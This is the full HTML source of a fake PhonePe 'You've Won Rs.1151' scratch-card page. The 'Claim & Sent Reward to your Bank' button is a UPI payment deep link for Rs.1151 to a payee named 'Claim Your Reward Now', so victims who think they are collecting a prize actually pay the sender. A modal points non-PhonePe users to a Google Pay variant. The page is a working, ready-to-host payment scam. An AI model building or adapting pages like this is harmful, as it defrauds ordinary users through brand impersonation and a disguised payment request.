
<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>You've Won Rs.1151 Thanks Phonepe</title>
<style>
    body {
        background: #ffffff;
        margin: 0px;
    }
.scratchpad{
  width: 450px;
  height: 445px;
  border: solid 10px #FFFFFF;
  margin:0 auto;
}
body {
    background:#efefef;
}
.scratch-container {
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -khtml-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  width:100%;
}
  /* Extra Small Devices, Phones */ 
          @media only screen and (max-width : 480px) {
            .scratchpad {width:400px;height:396px;}
            .scratch-container {width:400px !important;}
          }

          /* Custom, iPhone Retina */ 
          @media only screen and (max-width : 320px) {
            .scratchpad {width:290px;height:287px;}
            .scratch-container {width:290px !important;}
          }
.promo-container {
	background:#FFF;
	border-radius:5px;
	-moz-border-radius:5px;
	-webkit-border-radius:5px;
	width:450px;
	padding:20px;
	margin:0 auto;
	text-align:center;
	font-family:'Open Sans', Arial,Sans-serif;
	color:#333;
	font-size:16px;
	margin-top:20px;
}
.btn {
  background:#56CFD2;
  color:#FFF;
  padding:10px 25px;
  display:inline-block;
  margin-top:15px;
  text-decoration:none;
  font-weight:600;
  text-transform:uppercase;
  border-radius:3px;
  -moz-border-radius:3px;
  -webkit-border-radiuss:3px;
}
    .bottom {
        position: fixed;
        width: 100%;
        left: 0;
        bottom: 0px;
        text-align: center;
        background: #5f259e;
        /* color: #333; */
        padding: 14px 0px;
        font-size: 15px;
        font-family: font89466;
    }

    .bottom img {
        width: 98%;
        height: auto;
        /* margin-top: 69px; */
        padding: 0px 0px 0px 0px;
    }

    .bottom {}

    .center {
        /* text-align: center; */
        /* height: 100%; */
        /* vertical-align: middle; */
        /* padding: 25% 0px; */
        background: #5f259e;
        border-radius: 508px;
        width: 300px;
        height: 300px;
        margin: auto;
        border: 3px solid #f2f2f2;
    }

    .center img {
    width: 81%;
}
.header {
    width: 100%;
    background: #5f259e;
    padding: 10px 0px;
    text-align: center;
    color: #fff;
    font-size: 17px;
    font-family: font89466;
}

.center img {
    width: 187px;
    position: absolute;
    /* top: 0; */
    /* left: 0; */
    padding-top: 64px;
    padding-left: 56px;
}

.reward img {
    width: 153px;
    margin: 16px 20px;
}

a .bottom {
    color: #fff;
    text-decoration: none;
}

  </style>
<style>

/* The Modal (background) */
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 1; /* Sit on top */
  padding-top: 100px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
  background-color: #fefefe;
  margin: auto;
  padding: 20px;
  border: 1px solid #888;
  width: 80%;
}

/* The Close Button */
.close {
  color: #aaaaaa;
  float: right;
  font-size: 28px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}.step {
    margin-left: 17px;
}
</style>
</head>
<body>
<div class="header">You've Won PhonePe Reward</div><div class="reward"><img src="reward.png"></div>
<div class="scratch-container">
<div id="promo" class="scratchpad"></div>
</div>
<script src="../code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
<script type="text/javascript" src="js/wScratchPad.min.js"></script>
<script type="text/javascript">

var promoCode = '';
var bg1 = 'moneyre.png';
var bg2 = 'moneyreward2.png';
var bg3 = 'moneyreward3.png';
var bgArray= [ bg1, bg2, bg3 ],
selectBG = bgArray[Math.floor(Math.random() * bgArray.length)];
if (selectBG == bg1) {
    promoCode = '1099';
  } else if (selectBG == bg2) {
    promoCode = '1099';
  } if (selectBG == bg3) {
    var promoCode = '';
  }
$('#promo').wScratchPad({
    size        : 70,       
    bg:  selectBG,
    realtime    : true, 
    fg: 'scra.png',
    'cursor': 'url("") 5 5, default',

    scratchMove: function (e, percent) {
        if ((percent > 50) && (promoCode != '')) {
          $('.promo-container').show();
          $('body').removeClass('not-selectable');
          $('.promo-code').html('Your code is: ' + promoCode);
        }
      }
 });
</script>
<div class="step"><img src="direction.png" width="170px"></div>
<a href="phonepe://pay?pa=phonepe.scratch@icici&amp;pn=Claim Your Reward Now&amp;cu=INR&amp;am=1151&amp;tn=Claim Money"> <div class="bottom" id="myBtn">Claim &amp; Sent Reward to your Bank</div></a>

<div id="myModal" class="modal" style="display: none;">

<div class="modal-content">
<span class="close">×</span>
<p>Open phonepe app and sent your reward to your linked bank account.</p><p> if your not phonepe users try google pay reward</p> <a href="index-2.html">Try Google Pay</a>
</div>
</div>
</body>


</html>